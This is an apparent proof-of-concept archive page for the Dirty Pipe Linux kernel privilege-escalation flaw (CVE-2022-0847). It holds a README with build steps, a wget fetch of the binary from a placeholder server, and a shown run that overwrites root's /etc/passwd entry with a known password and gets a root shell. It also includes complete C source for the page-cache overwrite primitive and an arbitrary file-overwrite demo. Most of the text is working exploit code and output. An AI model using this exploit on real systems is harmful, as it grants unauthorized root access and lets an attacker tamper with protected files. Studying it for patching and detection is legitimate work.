POC details: e0f7d0e39fcafed10940c22801147644e959673b

Source
Related vulnerability
Title: Linux kernel security vulnerability (CVE-2022-0847)
Description: The Linux kernel is the kernel of Linux, the open-source operating system of the Linux Foundation (US). The Linux kernel contains a security vulnerability: the `flags` member of newly created pipe buffer structures is not properly initialized in the copy_page_to_iter_pipe and push_pipe functions. An unprivileged local user can exploit this flaw to escalate privileges to root. Affected products and versions: Linux kernel 5.8 and later, before the fixed releases 5.16.11, 5.15.25 and 5.10.102.
Description
Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.
Introduction
# Dirty Pipe Exploit: CVE-2022-0847
The Dirty Pipe vulnerability, CVE-2022-0847, is a local privilege-escalation flaw in the Linux kernel's pipe implementation: an unprivileged user can overwrite data in the page cache of any file they are allowed to open for reading. This repository provides an adapted version of the widely used exploit code, restructured to be more user-friendly and modular.

A very good explanation of this vulnerability can be found on the [HackTheBox blog](https://www.hackthebox.com/blog/Dirty-Pipe-Explained-CVE-2022-0847). Max Kellermann's original, more detailed explanation can be found [on his blog](https://dirtypipe.cm4all.com/).

This adapted version is split into separate methods to increase modularity and ease of modification. Notably, there is an added `--root` option that overwrites the root entry in /etc/passwd with a known password hash, so you can switch to root with the password `el3ph@nt!`. The tool backs up the target file to /tmp/<name>.bak first; as the output below shows, the injected root line also clobbers the entries that followed it (daemon, bin and sys), so restore /etc/passwd from that backup once you are done.

Compile the exploit statically, so the binary does not depend on the target's libc:
```shell
gcc -o dpipe dpipe.c -static
```

Then fetch it on the target and launch it:
```shell
yoan@teecup:~$ wget http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
--2023-10-15 20:07:44--  http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
Connecting to YOUR_SERVER_ADDRESS:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 769792 (752K) [text/plain]
Saving to: ‘dpipe’

dpipe                                   100%[=============================================================================>] 751.75K  --.-KB/s    in 0.09s

2023-10-15 20:07:44 (8.09 MB/s) - ‘dpipe’ saved [769792/769792]

yoan@teecup:~$ chmod +x dpipe
yoan@teecup:~$ ./dpipe --root
[Dirty Pipe] Attempting to backup '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Successfully backed up '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Initiating write to '/etc/passwd'...
[Dirty Pipe] Data size to write: 131 bytes
[Dirty Pipe] File '/etc/passwd' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to '/etc/passwd'.
[Dirty Pipe] You can connect as root with password 'el3ph@nt!'
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$
yoan@teecup:~$ cat /etc/passwd
root:$6$9WETWbCBTQ8pxg4I$odZAx8iIlayCnFdUwDM5dHVfsXXZo1RHRp2a4uQzcPDkRiTJYLA4loZESihn4ASGhWKN9.RWPT.CZJdyfTej4/:0:0:root:/root:/bin/sh
:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
yoan:x:1000:1000::/home/yoan:/bin/bash
yoan@teecup:~$ su root
Password:
# cd /root
# cat flag.txt
Great job! You found me.
```

You can also use the exploit to overwrite content in other files. The arguments are the target file, the byte offset at which to write, and the data to write; here offset 1 replaces `xxx` with `uln`:
```shell
yoan@teecup:~$ echo "Vxxx" > dirty
yoan@teecup:~$ cat dirty
Vxxx
yoan@teecup:~$ ./dpipe dirty 1 uln
[Dirty Pipe] Standard file overwrite mode detected...
[Dirty Pipe] Attempting to backup 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Successfully backed up 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Initiating write to 'dirty'...
[Dirty Pipe] Data size to write: 3 bytes
[Dirty Pipe] File 'dirty' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to 'dirty'.
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$ cat dirty
Vuln
```
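The log lines in both runs above (back up, open for reading, determine the pipe size, fill, drain, write) are the Dirty Pipe primitive from Max Kellermann's write-up. The following C program is an added example, not the repository's dpipe.c: it implements that primitive as one function, enforces the limits the primitive has (the target offset may not be page-aligned, and the write may neither cross a page boundary nor extend the file), and adds a read-back check so you can tell whether the page cache was actually modified, i.e. whether the kernel is vulnerable, instead of assuming success. The file name /tmp/dirty_pipe_example.txt and its `Vxxx` content are constructed for the demo and are not from the page.

```c
#define _GNU_SOURCE            /* splice(), F_GETPIPE_SZ, loff_t */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PAGE_SZ 4096           /* page-cache granularity on x86-64 */

/* Step 1: fill the pipe, then drain it. On a vulnerable kernel every
 * pipe_buffer slot keeps PIPE_BUF_FLAG_CAN_MERGE set afterwards: release
 * does not clear the flags and splice() never initialises them. */
static int prepare_pipe(int p[2])
{
    static char scratch[PAGE_SZ];
    if (pipe(p) < 0)
        return -1;
    int size = fcntl(p[1], F_GETPIPE_SZ), ok = size > 0;  /* 65536 by default */
    for (int r = size; ok && r > 0; r -= PAGE_SZ)
        ok = write(p[1], scratch, r < PAGE_SZ ? r : PAGE_SZ) > 0;
    for (int r = size; ok && r > 0; r -= PAGE_SZ)
        ok = read(p[0], scratch, r < PAGE_SZ ? r : PAGE_SZ) > 0;
    if (!ok) { close(p[0]); close(p[1]); }
    return ok ? 0 : -1;
}

/* Dirty Pipe primitive: put `len` bytes of `data` at `offset` into the page
 * cache of `path`, which only needs to be readable. Returns 0 when every step
 * completed, -1 (errno set) on error; confirm the effect with file_has_bytes_at(). */
int dirty_pipe_write(const char *path, off_t offset, const void *data, size_t len)
{
    /* Limits of the primitive: the write cannot start on a page boundary
     * (the byte before it is spliced first), cross one, or grow the file. */
    if (offset % PAGE_SZ == 0 || len == 0 || (size_t)(offset % PAGE_SZ) + len > PAGE_SZ) {
        errno = EINVAL;
        return -1;
    }
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    struct stat st;
    int p[2], rc = -1;
    if (fstat(fd, &st) < 0 || st.st_size < offset + (off_t)len || prepare_pipe(p) < 0) {
        close(fd);
        return -1;
    }
    /* Step 2: splice one byte from just before the target into the pipe, so
     * the pipe buffer points straight at the file's page-cache page.
     * Step 3: CAN_MERGE is still set on that slot, so this write is merged
     * into the page-cache page instead of going to a fresh pipe buffer. */
    loff_t off_in = offset - 1;
    if (splice(fd, &off_in, p[1], NULL, 1, 0) == 1 && write(p[1], data, len) == (ssize_t)len)
        rc = 0;
    close(p[0]); close(p[1]); close(fd);
    return rc;
}

/* 1 if `path` holds `data` at `offset`, 0 if unchanged (patched kernel),
 * -1 on I/O error. */
int file_has_bytes_at(const char *path, off_t offset, const void *data, size_t len)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    char *buf = malloc(len);
    ssize_t n = buf ? pread(fd, buf, len, offset) : -1;
    int r = !buf ? -1 : (n == (ssize_t)len && memcmp(buf, data, len) == 0);
    close(fd);
    free(buf);
    return r;
}

/* Demo on a constructed sample file (not from the page): the README's Vxxx -> Vuln
 * overwrite. Returns 1 if the page cache changed (vulnerable), 0 if not, -1 on error. */
int run_demo(void)
{
    const char *path = "/tmp/dirty_pipe_example.txt";
    FILE *f = fopen(path, "w");
    if (!f)
        return -1;
    int ok = fputs("Vxxx\n", f) >= 0;
    if (fclose(f) != 0 || !ok || dirty_pipe_write(path, 1, "uln", 3) < 0)
        return -1;
    return file_has_bytes_at(path, 1, "uln", 3);
}

int main(void)
{
    int r = run_demo();
    if (r < 0) { perror("dirty pipe"); return 1; }
    puts(r ? "page cache modified: kernel is vulnerable" : "file unchanged: kernel is patched");
    return 0;
}
```

Build it the same way as the tool, `gcc -static -o dp_example dp_example.c` (file name assumed), and run it without arguments. The target is opened O_RDONLY: the bug turns read access into a write into the page cache, which is why an unprivileged user can change /etc/passwd. The page is never marked dirty, so nothing is written back to disk; the modified content is what every later read returns until the page is evicted or the machine reboots.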
File snapshot

[4.0K] /data/pocs/e0f7d0e39fcafed10940c22801147644e959673b
├── [865K] dpipe
├── [7.5K] dpipe.c
├── [1.0K] LICENSE
└── [4.2K] README.md

0 directories, 4 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the POC through the source link.
    2. If the source has gone away or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC.